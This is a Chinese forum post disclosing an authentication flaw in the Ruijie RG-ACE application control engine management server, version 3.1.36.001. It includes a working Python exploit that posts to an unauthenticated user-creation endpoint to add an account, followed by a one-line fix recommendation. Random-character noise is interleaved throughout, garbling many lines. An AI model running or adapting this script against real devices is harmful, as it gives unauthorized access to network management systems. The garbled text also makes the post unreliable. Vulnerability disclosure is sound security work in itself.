找回密码
 立即注册
查看: 3052|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
7 o  ]9 Q, q/ _" E! G5 t7 m% X- p6 q

" I. W) h/ \4 d0 e$ F* v测试的具体版本是6 w: l+ y+ F; r8 q9 Y  q
产品名称: 锐捷应用控制引擎  Y1 Y6 j0 ^1 c! V  l: V7 N5 \
版本号: 3.1.36.001 TC
& v. c6 q: q  m' B3 E% Y3 _编译时间: 201104291730
3 @9 D) X4 [; Z+ x 8 A6 \( z* ]. U  w6 K0 d

/ J/ @8 l4 z: H/ V漏洞证明:
; ^+ l; e- \+ _* s9 P6 `# p 5 e7 K& x; E. Z2 u9 ~! S7 f2 Q+ C
6 ]8 q* v/ j9 E* K" k; @

1 W( t# D; p3 B0 ]$ X6 @) }# ]8 s' x7 P0 p

# m8 W; t% l% r3 k( |' a+ _4 c& S: ~8 R2 ?$ p5 ]
执行脚本# V  L6 s! l+ {4 T- _& _0 w
#! /usr/bin/env python
  I! c1 h% X* n# ]1 p#coding=gbk
$ m- D9 ^* K; s* u#RG-ACE管理服务器 V3.1.36.0018 ?. [9 I  L' e) S) A. D
import urllib2, urllib,cookielib. t/ `( A  A8 T/ ^( S7 ]
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP- ?5 W* [; j8 q$ j. p
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
( j% z7 g$ g, A2 T8 d1 a1 G2 ~+ A1 Fopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]) k7 C2 N4 k( k6 X& F
post=(("event","userManager.doInsertUserInfo"),
; `8 Z) v5 m) E# r# V" I4 }& j("useractionname","addButtonValue"),$ c( g% f( j4 s5 Q1 G$ k) |/ g" |# D# N
("useropermanager","userManager"),' ?6 h- s  @$ Z( h! n( o* V+ \* ?* A9 m: U
("userName","t"), #######账号自己加9 r9 m: e7 F6 [1 Q0 A, _: H2 `) G6 |
("pwd","aaaaaa"),######密码自己加
- ~* S0 d& P: D2 Q3 |$ U' u("trueName","ad"),' P. b! P7 D$ y. H4 V& d: T& K' r
("email",""),% y; n2 @  m0 d, |
("mobilePhone",""),1 P6 y0 ~! i# p9 Y% ?4 a
("officePhone",""),
+ Z$ m1 ]$ I2 k3 g/ K0 ^("addr",""),6 l/ J" E" t9 G2 k4 n, y, r5 h
("submit","确定"))% \) g. Y3 q3 \+ r2 `) n- |
urllib2.install_opener(opener): E  G% V8 C8 {1 f0 G* [; r+ |
p=urllib2.urlopen(url, urllib.urlencode(post)).read()( N5 e0 v; x' r) S
print "Done"4 g! m+ c/ H* n* F( }4 z8 ~

* S) Q" L7 v! N$ H- {0 Z; F登录,连接设备
$ P  ~) d$ v" G6 ~: @& s
& H" j8 s2 h' d# l
' i! O& c9 n% X# N' Y- P2 V2 _) [7 R

% N  S1 O; u/ ]0 o# M
* ^  P, z8 Y0 X# U' E  q默认的管理员admin权限更大点8 L& N1 w* @" ?

5 @0 _5 B- r. l7 Y$ g, v6 f5 w; U6 V2 t' i9 n- s" w

1 h3 O4 D) x9 J & ~& `& Q2 g4 ?% g
) Z1 G* ~3 F# U# ^; C
修复方案:! p( J) @" G7 h* Y: c3 \
加强对接口的权限验证, N9 P+ _( f1 n
" _+ N! c# x( L: H/ @7 Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表